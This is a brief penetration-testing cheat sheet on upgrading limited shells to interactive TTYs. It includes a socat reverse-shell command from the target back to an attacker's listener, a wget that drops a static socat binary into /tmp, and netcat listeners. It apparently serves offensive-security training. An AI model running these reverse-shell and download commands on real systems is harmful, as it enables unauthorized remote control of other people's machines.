Upgrading Shells
A list of methods to upgrade shells to fully interactive TTYs!
Python PTY Upgrade
Run the following command in the limited shell:
python -c 'import pty; pty.spawn("/bin/bash")'
The shell will now look prettier and have some TTY capabailities. To make it have full interactivty, use the following command to give access to term commands such as clear
:
export TERM=xterm
Finally, background the shell with [Ctrl-Z] option, then from the attack box, use the following command. This will turn off the attack box's terminal echo which gives autocompletes and arrow keys. Then it will foreground the shell again.
stty raw -echo
fg
If this works, it will end as a fully interactive TTY shell. Sometimes, it might also be useful to modify the terminal tty size. This can be done by checking your attack box's values and then copying them over with the following:
# Attack box - gives row and column length
stty -a
# Shell
stty rows $ROW_LENGTH
stty cols $COL_LENGTH
Socat Upgrade
The following method uses socat to create a second reverse shell for a fully interactive shell through the following methodology.
On the attack box, create a listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
On the target, launch a reverse shell:
socat exec:'bash-li',pty,stderr,setsid,sigint,sane tcp:$IP:4444
If socat is missing, it can be installed using a static generated version with the following command:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat
chmod +x /tmp/socat
RLWrap Upgrade
The program rlwrap
gives access to history, tab autocompletion, and the arrow keys immediately upon receiving a shell. Sometimes, manual stabilization must still be utilized for interrupts like [Ctrl-C] to be used.
rlwrap nc -nvlp $PORT
Often times, this can be an alias as well to overwrite a listener.
alias listener='sudo rlwrap nc -nvlp'
Last updated